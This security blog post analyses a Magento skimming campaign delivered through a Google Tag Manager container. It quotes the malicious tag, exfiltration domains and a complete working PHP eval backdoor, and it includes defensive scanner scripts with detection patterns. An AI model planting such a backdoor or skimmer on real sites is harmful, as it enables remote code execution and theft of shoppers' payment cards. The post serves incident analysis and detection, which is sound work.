Hackers Use Google Tag Manager to Inject Credit Card Skimmers in E-Commerce Stores
Malware campaign abusing GTM to inject credit card skimmers into e-commerce sites. Obfuscated JavaScript stealing payment data, along with a hidden PHP backdoor for persistent access.
data:image/s3,"s3://crabby-images/babfa/babfaa2044868f0974c5381897d3f978668f8ce8" alt=""
A new malware campaign is abusing Google Tag Manager (GTM) to inject credit card skimmers into Magento-based e-commerce websites, security researchers at Sucuri have discovered.
At least six compromised websites were identified, with attackers using GTM to inject obfuscated JavaScript skimmers that steal credit card details directly from checkout pages.
This attack demonstrates how cybercriminals are increasingly leveraging legitimate web services to bypass security measures and exfiltrate financial data.
Hell, who remembers my BlackHat talk in 2013, Million Browser Botnet, that abused ads to inject JavaScript into websites? This attack would still work just as I detailed it back then.
How the GTM Attack Works
The investigation began after a customer reported unauthorized credit card transactions linked to their Magento store.
According to Sucuri's report, the malware was traced to a malicious Google Tag Manager script reference stored in the content column of Magento's cms_block table, which holds the HTML of CMS blocks rendered into the storefront.
Sucuri explained in their report that attackers used GTM as a delivery mechanism for the malicious JavaScript. The reference on the site points at a legitimate Google domain and the skimmer itself lives inside the GTM container rather than in any file on the server, which is why file-based scans and a quick look at the page source turn up nothing.
Technical Breakdown of the Attack
1. Malicious GTM Script Embedded in Magento Database
The content column of the cms_block table held what looked like an ordinary GTM loader tag:
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-MLHK2N68"></script>
However, deeper analysis revealed obfuscated JavaScript embedded inside the GTM container itself.
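The reference above is the only trace of the campaign that lives on the server, so the practical check is to audit what the cms_block table actually loads. The following script is an added example written for this post, not Sucuri's tooling or Magento code: it takes rows exported from cms_block (block_id, identifier, content), flags every GTM container ID that is not in an allowlist you maintain, every script loaded from a host you do not expect (which also catches lookalike domains), and inline scripts carrying common obfuscation markers. The allowlists and sample rows are assumptions constructed for the example; the GTM-MLHK2N68 ID is the one from the report.

```python
"""Audit the content column of Magento's cms_block table for Google Tag
Manager references the shop owner did not put there.

Added example for this post; not Sucuri's tooling and not Magento code.
Export rows with something like
    SELECT block_id, identifier, content FROM cms_block;
and feed them to audit_rows().
"""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Both allowlists are assumptions for the example; fill them from your own records.
KNOWN_CONTAINERS = {"GTM-ABCD123"}
ALLOWED_SCRIPT_HOSTS = {"www.googletagmanager.com"}

GTM_ID_RE = re.compile(r"\bGTM-[A-Z0-9]{4,}\b")
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_SCRIPT_RE = re.compile(r"<script(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)

# Tokens common in packed skimmers and rare in hand-written CMS block markup.
OBFUSCATION_MARKERS = ("eval(", "atob(", "unescape(", "String.fromCharCode", "\\x")


@dataclass
class Finding:
    block_id: int
    identifier: str
    kind: str
    detail: str


def audit_block(block_id: int, identifier: str, content: str) -> list[Finding]:
    """Return every suspicious item found in one cms_block row."""
    findings = []
    # 1. Any container ID, whether in a gtm.js URL or inside the inline GTM snippet.
    for container in sorted(set(GTM_ID_RE.findall(content))):
        if container not in KNOWN_CONTAINERS:
            findings.append(Finding(block_id, identifier, "unknown-gtm-container", container))
    # 2. External scripts from hosts outside the allowlist; relative URLs are local and skipped.
    for src in SCRIPT_SRC_RE.findall(content):
        host = (urlparse(src).hostname or "").lower()
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(Finding(block_id, identifier, "external-script", src))
    # 3. Inline scripts that look packed or obfuscated.
    for body in INLINE_SCRIPT_RE.findall(content):
        hits = [m for m in OBFUSCATION_MARKERS if m in body]
        if hits:
            findings.append(Finding(block_id, identifier, "obfuscated-inline-script", ",".join(hits)))
    return findings


def audit_rows(rows) -> list[Finding]:
    """Audit an iterable of (block_id, identifier, content) tuples."""
    return [f for row in rows for f in audit_block(*row)]


# Constructed sample rows; not data from any real store.
SAMPLE_ROWS = [
    (1, "footer_links", '<p><a href="/contact">Contact us</a></p>'),
    (2, "analytics", '<script src="https://www.googletagmanager.com/gtm.js?id=GTM-ABCD123"></script>'),
    (3, "home_banner", '<div>Spring sale</div>'
                       '<script src="https://www.googletagmanager.com/gtm.js?id=GTM-MLHK2N68"></script>'),
    (4, "checkout_note", "<script>var _0x1=eval(atob('Li4u'));</script>"),
]

if __name__ == "__main__":
    for f in audit_rows(SAMPLE_ROWS):
        print(f"block {f.block_id} ({f.identifier}): {f.kind} -> {f.detail}")
```

Run it against a fresh export after every deployment and diff the findings; a container ID that nobody on the team recognises is the whole signal in this campaign, since the tag itself is syntactically identical to a legitimate one.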
2. Obfuscated Credit Card Skimmer
The skimmer only activates on checkout pages, where it captures the card details shoppers type into the payment form.
The stolen data is exfiltrated to an attacker-controlled command-and-control (C2) domain, eurowebmonitortool[.]com.
3. PHP Backdoor Discovered in Media Directory
Attackers also planted a PHP backdoor at media/index.php that lets them execute arbitrary PHP code remotely. The payload arrives base64-encoded twice in the order request parameter, and the backdoor only runs it when the SHA-256 hash of a second parameter, item, contains a fixed substring, which acts as a password so that only the operator can use it. That gate is what gave the attackers persistent access:
<?php
// Reads a request parameter (GET or POST, via $_REQUEST) with a fallback default.
function get_data($param, $default) {
    $total = $_REQUEST;
    return isset($total[$param]) ? $total[$param] : $default;
}

// Gate plus payload: returns nothing unless the SHA-256 of "item" contains the
// hard-coded substring; otherwise returns the "order" parameter decoded twice.
function get_cli() {
    if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )
        return "";
    $data = get_data("order", "");
    return base64_decode(base64_decode($data));
}

// Executes whatever get_cli() returns; an empty string is a no-op for casual visitors.
eval(get_cli());
This type of backdoor allows attackers to inject additional malware, escalate privileges, or steal even more data.
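A scan of media/ for this backdoor does not need a signature for the exact file. The following script is an added example written for this post, not Sucuri's or Magento's code: it reports every PHP file under media/ (an upload directory that should contain none) and tags each with the traits visible in the code above, namely eval()-style execution, input taken from request parameters, base64_decode() nested twice, and the strpos(hash(...)) password gate, so the worst files sort to the top. The backdoor text is reproduced from the page purely as scanner input; the benign file and the directory layout are constructed for the example.

```python
"""Scan a Magento media/ tree for PHP backdoors like the media/index.php above.

Added example for this post; not Sucuri's or Magento's code.
"""
import re
import tempfile
from pathlib import Path

PHP_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}

# Traits of the backdoor shown on this page, each as a regex over PHP source.
RULES = {
    "eval-like":     re.compile(r"\b(eval|assert|create_function)\s*\("),
    "nested-base64": re.compile(r"base64_decode\s*\(\s*base64_decode\s*\("),
    "request-input": re.compile(r"\$_(REQUEST|POST|GET|COOKIE)\b"),
    "hash-gate":     re.compile(r"strpos\s*\(\s*hash\s*\("),
}


def score_php(source: str) -> list[str]:
    """Names of the backdoor traits present in one PHP source text."""
    return [name for name, rx in RULES.items() if rx.search(source)]


def is_backdoor_like(source: str) -> bool:
    """Code execution combined with attacker-controlled input is the pairing that matters."""
    hits = score_php(source)
    return "eval-like" in hits and ("request-input" in hits or "nested-base64" in hits)


def scan_media_dir(root) -> list[tuple[str, list[str]]]:
    """Every PHP file under root with its traits; an empty list still means 'PHP in media/'."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            traits = score_php(path.read_text(errors="replace"))
            findings.append((path.relative_to(root).as_posix(), traits))
    return findings


# The backdoor from the Sucuri report, reproduced only as scanner input.
BACKDOOR_SAMPLE = '''<?php
function get_data($param, $default) {
    $total = $_REQUEST;
    return isset($total[$param]) ? $total[$param] : $default;
}
function get_cli() {
    if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )
        return "";
    $data = get_data("order", "");
    return base64_decode(base64_decode($data));
}
eval(get_cli());
'''

# Constructed benign file: PHP that has no business in media/ but is not a backdoor.
BENIGN_SAMPLE = '<?php\nheader("Location: /");\n'


def demo_scan() -> dict[str, list[str]]:
    """Build a throwaway media/ tree with both samples plus an image, then scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "catalog" / "product").mkdir(parents=True)
        (root / "catalog" / "product" / "shoe.jpg").write_bytes(b"\xff\xd8\xff\xe0")
        (root / "index.php").write_text(BACKDOOR_SAMPLE)
        (root / "catalog" / "helper.php").write_text(BENIGN_SAMPLE)
        return dict(scan_media_dir(root))


if __name__ == "__main__":
    for path, traits in demo_scan().items():
        print(f"{path}: {', '.join(traits) or 'no backdoor traits, but PHP should not be here'}")
```

The trait list is a triage aid, not proof; a file that hits eval-like and request-input together deserves a manual read regardless of its name, and any PHP in media/ at all means checking whether the web server is actually configured to execute it.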
Connection to Magecart Techniques
This attack bears similarities to past Magecart campaigns, which have targeted e-commerce platforms with web-skimming malware.
In 2024, security researchers linked the Magecart actor ATMZOW to a separate GTM-based skimming operation.
While Sucuri did not directly attribute this campaign to Magecart ATMZOW, the tactic of injecting malicious scripts via GTM aligns with previous Magecart techniques.
Remediation & Security Recommendations
To mitigate this attack, Sucuri researchers removed the malicious GTM references, cleaned the database, and deleted the PHP backdoor.
They also provided the following security recommendations for site owners:
Audit Google Tag Manager – Log into GTM and review all active tags, especially Custom HTML tags, along with the container's version history and who has publish rights. Remove any unknown or suspicious scripts.
Perform a full website malware scan – Check for hidden scripts, injected JavaScript, and modified database entries.
Check Magento’s media/ directory – Look for unauthorized PHP files, as attackers frequently hide backdoors here, and make sure the web server is not configured to execute PHP from it.
Keep Magento & extensions updated – Ensure Magento core and all third-party extensions are running the latest security patches.
Monitor site traffic & GTM activity – Use security logging to track unusual script activity in checkout flows.
Expanding Context: The 2021 GTM-Based Magecart Campaign
This is not the first time Google Tag Manager has been weaponized for large-scale credit card theft. A 2021 investigation by security researchers uncovered a massive Magecart campaign that compromised 316 e-commerce sites worldwide using a nearly identical attack method.
Key Findings from the 2021 Campaign
Attackers abused Google Tag Manager containers to inject malicious JavaScript into checkout pages.
The malware campaign led to the theft of at least 88,000 payment card records, which were later posted on dark web marketplaces.
Magecart actors used two primary methods to execute these attacks:
Embedding the credit card skimming script directly into GTM containers.
Using GTM to load the skimming script from an external domain.
Many of the affected sites were small-to-medium-sized businesses running Magento, a historically popular target for Magecart operations due to its self-hosted nature and the security burden placed on individual site owners.
How Magecart Attackers Used GTM in 2021
Similar to the current 2025 attack uncovered by Sucuri, the 2021 campaign took advantage of Google’s trusted infrastructure:
JavaScript inside GTM containers executes automatically once loaded on a page.
Security tools often fail to flag GTM traffic since it originates from a legitimate Google service.
Attackers could dynamically update scripts without needing direct access to compromised websites.
A major concern raised by researchers at the time was how Google’s widespread adoption as a trusted third-party service provided attackers with built-in credibility, allowing their malicious scripts to run undetected for extended periods.
Indicators of Compromise from the 2021 Attacks
Infected e-commerce sites loaded Magecart skimmers through GTM with obfuscated JavaScript, much like the GTM-MLHK2N68 attack Sucuri identified in 2025. The malware operated by:
Capturing user input on checkout pages, including credit card numbers, expiration dates, CVV codes, and billing addresses.
Encoding the stolen data in Base64 and sending it to attacker-controlled exfiltration domains.
Masquerading as legitimate Google services by using typosquatted or fake domains, such as:
googleadwordstrack[.]com
googletrackevent[.]com
googleadwordswidget[.]com
Why This Matters Now
The 2025 campaign uncovered by Sucuri follows this same GTM abuse strategy, reinforcing the fact that Magecart-style skimming attacks are evolving, not disappearing.
The shift from on-site injection (modifying JavaScript files) to leveraging GTM and other trusted services makes these attacks harder to detect.
Lessons Learned & Long-Term Defenses
Magecart actors have been exploiting Google services, third-party scripts, and misconfigured web security for years. This 2025 GTM attack and the 2021 campaign both highlight:
The importance of monitoring GTM and third-party integrations.
The need for strict Content Security Policies (CSPs), with the caveat that a policy which trusts googletagmanager.com in script-src cannot block a skimmer delivered inside the container; the value of CSP here is in restricting where data may be sent (connect-src, img-src, form-action).
Why regular site audits are necessary, especially for Magento store owners.
The growing trend of attackers using legitimate services to evade detection.
Given the similarities between this attack and previous Magecart operations, businesses should assume this tactic will persist and ensure continuous monitoring of their GTM and security configurations.
In case you wanted to follow up on my BlackHat talk I mentioned above, here it is. We bought an ad, got it approved, then swapped the JavaScript out in it to DDoS our targets. For less than $100 we generated some serious pain.